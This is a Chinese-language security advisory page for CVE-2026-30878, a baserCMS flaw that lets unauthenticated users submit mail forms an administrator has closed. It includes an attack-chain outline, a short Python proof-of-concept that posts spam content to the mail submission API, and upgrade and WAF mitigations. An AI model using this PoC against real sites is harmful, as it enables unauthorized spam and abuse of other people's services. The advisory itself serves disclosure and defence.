IPBUF安全漏洞报告
English
CVE-2026-30878 CVSS 5.3 中危

CVE-2026-30878 baserCMS API提交控制绕过漏洞

披露日期: 2026-03-31

漏洞信息

漏洞编号
CVE-2026-30878
漏洞类型
访问控制绕过
CVSS评分
5.3 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
baserCMS

相关标签

baserCMS访问控制绕过逻辑漏洞无需认证

漏洞概述

baserCMS是一个广泛使用的网站开发框架。在5.2.3版本之前,其公开的邮件提交API存在严重逻辑缺陷。未经身份认证的远程攻击者可以利用此漏洞,绕过管理员在后台设置的表单接收限制,强行提交邮件表单条目。该问题导致原本旨在停止表单摄入的管理控制完全失效,攻击者可借此发送大量垃圾邮件或进行恶意滥用,对业务造成干扰。

技术细节

该漏洞的根源在于baserCMS在处理邮件表单提交时的业务逻辑校验不严格。虽然管理员可以通过后台配置关闭特定表单的接收功能,但在受影响版本中,处理表单提交的公共API接口并未有效验证表单的当前状态或执行权限检查。由于该漏洞无需用户交互(UI:N)且无需身份认证(PR:N),攻击者可以直接构造恶意HTTP POST请求发送至API端点。这个请求会绕过前端限制和管理配置,直接将数据写入系统。这种逻辑缺陷使得攻击者能够无视“停止接收”的指令,导致系统面临垃圾信息轰炸和资源滥用的风险。此外,由于缺乏速率限制,攻击者还可自动化脚本进行大规模批量提交,进一步加剧了对服务可用性和业务处理能力的冲击。

攻击链分析

STEP 1
侦察
识别目标是使用baserCMS构建的网站,且版本低于5.2.3。
STEP 2
分析
定位公开的邮件提交API端点路径。
STEP 3
利用
无需认证,直接向API端点发送构造好的POST数据包。
STEP 4
绕过
API后端逻辑未检查表单是否已关闭,直接接收并处理数据。
STEP 5
影响
成功提交表单数据,实现垃圾邮件发送或数据滥用。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests def exploit_basercms(target_url): """ PoC for CVE-2026-30878: Bypass form submission controls in baserCMS. This script attempts to submit a mail form even if it is closed. """ # The endpoint for the public mail submission API api_endpoint = f"{target_url}/api/mail/submissions" # Payload simulating a form entry payload = { "mail_content": "Test spam content via CVE-2026-30878", "email": "[email protected]", "name": "Exploit Test" } try: # Send POST request without authentication response = requests.post(api_endpoint, data=payload) if response.status_code == 200: print("[+] Exploit successful! Form submitted bypassing admin controls.") print(f"[+] Response: {response.text}") else: print(f"[-] Exploit failed. Status code: {response.status_code}") except Exception as e: print(f"[!] Error occurred: {e}") if __name__ == "__main__": target = "http://localhost" # Replace with actual target exploit_basercms(target)

影响范围

baserCMS < 5.2.3

防御指南

临时缓解措施
建议立即将baserCMS升级到5.2.3或更高版本以修复此漏洞。如果无法立即升级,应暂时在防火墙或WAF层面禁用对公开邮件提交API的访问,或通过服务器配置限制对该API的调用频率,以防止垃圾邮件或恶意滥用。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表